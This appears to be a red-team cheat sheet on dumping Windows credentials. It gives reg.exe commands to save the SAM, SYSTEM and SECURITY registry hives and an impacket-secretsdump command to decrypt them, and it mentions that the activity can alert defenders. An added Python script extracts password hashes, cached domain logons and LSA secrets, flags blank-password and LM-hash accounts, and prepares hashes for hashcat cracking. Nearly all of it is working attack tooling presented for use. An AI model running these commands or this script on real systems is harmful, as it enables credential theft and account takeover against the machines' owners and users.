REGISTRY
This is a FLAGGED OPERATION: dumping registry hives can alert Blue Teamers, since access to the SAM and SECURITY keys is auditable
EVENT IDs
4656 - A handle to an object was requested; with object access auditing enabled on the SAM key this fires when password hashes are dumped from the registry using tools such as Mimikatz, Pysecdump, or Metasploit
We can dump secrets from the machine using the REGISTRY HIVES (reg.exe save needs an elevated prompt: SAM and SECURITY are readable only by SYSTEM and administrators)
Saving SAM hive into the local machine
reg.exe save HKLM\SAM <PATH TO DUMP>
Saving SYSTEM hive into the local machine
reg.exe save HKLM\SYSTEM <PATH TO DUMP>
Saving SECURITY hive into the local machine
reg.exe save HKLM\SECURITY <PATH TO DUMP>
After dumping the registry hives and transferring them to our local machine (impacket's flags are lowercase; -security is optional and only needed for LSA secrets and cached domain credentials)
impacket-secretsdump -sam sam -system system -security security LOCAL
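Added example, not part of the original page: a small Python helper for the offline step. dump_local_hives() drives the same impacket classes that impacket-secretsdump uses (LocalOperations, SAMHashes, LSASecrets from impacket.examples.secretsdump, assumed installed), and triage()/hashcat_input() turn the familiar user:rid:lmhash:nthash::: lines into a quick list of blank-password accounts, accounts still storing LM hashes, and hashcat -m 1000 input. The sample output, boot key and hashes are constructed for illustration (the NT/LM values are the well-known hashes of "password" and of the empty string).

```python
"""Post-process SAM/SYSTEM/SECURITY hive dumps (added example, not impacket's own code)."""
import re
from typing import Dict, List, Optional

# Hash of the empty string under each scheme; both are well-known constants.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# secretsdump SAM line: user:rid:lmhash:nthash:::
_SAM_LINE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")

# Constructed sample of what secretsdump prints (banner lines plus three accounts).
SAMPLE_OUTPUT = """\
[*] Target system bootKey: 0x0123456789abcdef0123456789abcdef
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
legacyuser:1001:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
"""


def parse_secretsdump_line(line: str) -> Optional[Dict]:
    """Parse one 'user:rid:lm:nt:::' line; return None for banner or other lines."""
    m = _SAM_LINE.match(line.strip())
    if not m:
        return None
    user, rid, lm, nt = m.groups()
    lm, nt = lm.lower(), nt.lower()
    return {
        "user": user,
        "rid": int(rid),
        "lm": lm,
        "nt": nt,
        "blank_password": nt == EMPTY_NT,     # empty NT hash => no password set
        "lm_hash_present": lm != EMPTY_LM,    # real LM hash => legacy storage, trivially crackable
    }


def triage(lines) -> List[Dict]:
    """Keep only the account lines from raw secretsdump output, in order."""
    return [r for r in (parse_secretsdump_line(l) for l in lines) if r]


def hashcat_input(rows) -> List[str]:
    """'user:nthash' lines for `hashcat -m 1000 --username`; blank passwords need no cracking."""
    return [f"{r['user']}:{r['nt']}" for r in rows if not r["blank_password"]]


def dump_local_hives(sam_path: str, system_path: str, security_path: Optional[str] = None) -> Dict[str, List[str]]:
    """Equivalent of `impacket-secretsdump -sam ... -system ... [-security ...] LOCAL`,
    collecting results instead of printing them. Assumes impacket is installed."""
    from impacket.examples.secretsdump import LocalOperations, SAMHashes, LSASecrets

    boot_key = LocalOperations(system_path).getBootKey()   # derived from SYSTEM hive class names
    out: Dict[str, List[str]] = {"sam": [], "lsa": []}

    sam = SAMHashes(sam_path, boot_key, isRemote=False, perSecretCallback=out["sam"].append)
    sam.dump()
    sam.finish()

    if security_path:
        lsa = LSASecrets(security_path, boot_key, None, isRemote=False, history=False,
                         perSecretCallback=lambda kind, secret: out["lsa"].append(secret))
        lsa.dumpCached()    # cached domain logons (DCC2)
        lsa.dumpSecrets()   # LSA secrets: service account passwords, $MACHINE.ACC, DPAPI keys
        lsa.finish()
    return out


if __name__ == "__main__":
    import sys
    if len(sys.argv) >= 3:
        result = dump_local_hives(sys.argv[1], sys.argv[2], sys.argv[3] if len(sys.argv) > 3 else None)
        rows = triage(result["sam"])
    else:
        rows = triage(SAMPLE_OUTPUT.splitlines())
    for r in rows:
        flags = [k for k in ("blank_password", "lm_hash_present") if r[k]]
        print(f"{r['user']:<16} rid={r['rid']:<5} {' '.join(flags)}")
    print("\n".join(hashcat_input(rows)))
```

Run it as `python3 dump_triage.py sam system security` on the files produced by reg.exe save, or with no arguments to see the triage of the constructed sample. The triage flags are what you actually act on: a blank NT hash is a free logon, and any non-empty LM hash means the box still stores LM, which cracks in minutes.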